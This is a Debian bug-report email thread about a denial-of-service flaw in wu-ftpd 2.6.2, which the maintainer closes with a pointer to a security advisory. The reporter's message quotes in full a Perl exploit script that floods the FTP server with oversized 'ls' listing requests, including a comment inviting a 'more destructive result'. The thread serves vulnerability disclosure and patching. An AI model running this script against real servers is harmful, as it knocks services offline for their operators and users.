Your message dated Tue, 5 Apr 2005 22:48:37 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Fixed
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 4 Nov 2003 18:39:44 +0000
>From [EMAIL PROTECTED] Tue Nov 04 12:39:34 2003
Return-path: <[EMAIL PROTECTED]>
Received: from web13805.mail.yahoo.com [216.136.175.15]
by master.debian.org with smtp (Exim 3.35 1 (Debian))
id 1AH65W-0002I8-00; Tue, 04 Nov 2003 12:39:34 -0600
Message-ID: <[EMAIL PROTECTED]>
Received: from [208.165.59.137] by web13805.mail.yahoo.com via HTTP; Tue, 04
Nov 2003 10:39:33 PST
Date: Tue, 4 Nov 2003 10:39:33 -0800 (PST)
From: Miguel Quesada <[EMAIL PROTECTED]>
Subject: DoS in WU-FTPD (exploit in 'ls')
To: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Delivered-To: [EMAIL PROTECTED]
X-Spam-Status: No, hits=-4.0 required=4.0
tests=BAYES_70,HAS_PACKAGE
version=2.53-bugs.debian.org_2003_11_03
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53-bugs.debian.org_2003_11_03
(1.174.2.15-2003-03-30-exp)
Package: wu-ftpd
Version: 2.6.2-3woody2
I found the following exploit and ran it on the
machines I administer... it wasn't nice...
----
#!/usr/bin/perl
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;
(($target = $ARGV[0])&&($count = $ARGV[1])) || die
"usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "[EMAIL PROTECTED]";
$cols=1000000;#you can increase this value for more
destructive result ;)
print ":: Trying to connect to target system at:
$target...\n"; $ftp = Net::FTP->new($target, Debug =>
0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login:
$!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
$count--;
}
print "Done!\n";
$ftp->quit;
---
After this, the system stalls for a considerable long
time. Hope u guys found a workaround for this...
regards.
__________________________________
Do you Yahoo!?
Protect your identity with Yahoo! Mail AddressGuard
http://antispam.yahoo.com/whatsnewfree
---------------------------------------
Received: (at 219165-done) by bugs.debian.org; 5 Apr 2005 21:49:02 +0000
>From [EMAIL PROTECTED] Tue Apr 05 14:49:02 2005
Return-path: <[EMAIL PROTECTED]>
Received: from pie.crustynet.org.uk [217.147.177.118] (postfix)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DIvuw-0003Kk-00; Tue, 05 Apr 2005 14:49:02 -0700
Received: from localhost (localhost.localdomain [127.0.0.1])
by pie.crustynet.org.uk (Postfix) with ESMTP id 1665F13F60
for <[EMAIL PROTECTED]>; Tue, 5 Apr 2005 22:48:41 +0100 (BST)
Received: from pie.crustynet.org.uk ([127.0.0.1])
by localhost (pie [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
id 18346-05 for <[EMAIL PROTECTED]>;
Tue, 5 Apr 2005 22:48:37 +0100 (BST)
Received: by pie.crustynet.org.uk (Postfix, from userid 1000)
id D8D3C13F5F; Tue, 5 Apr 2005 22:48:37 +0100 (BST)
Date: Tue, 5 Apr 2005 22:48:37 +0100
From: Chris Butler <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Fixed
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Mutt/1.5.6+20040907i
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at crustynet.org.uk
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-2.0 required=4.0 tests=BAYES_00,ONEWORD autolearn=no
version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
This has now been fixed in woody as well, see DSA 705-1[1].
[1] http://lists.debian.org/debian-security-announce/debian-security-announ=
ce-2005/msg00085.html
--=20
Chris Butler <[EMAIL PROTECTED]>
GnuPG Key ID: 1024D/D097A261
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
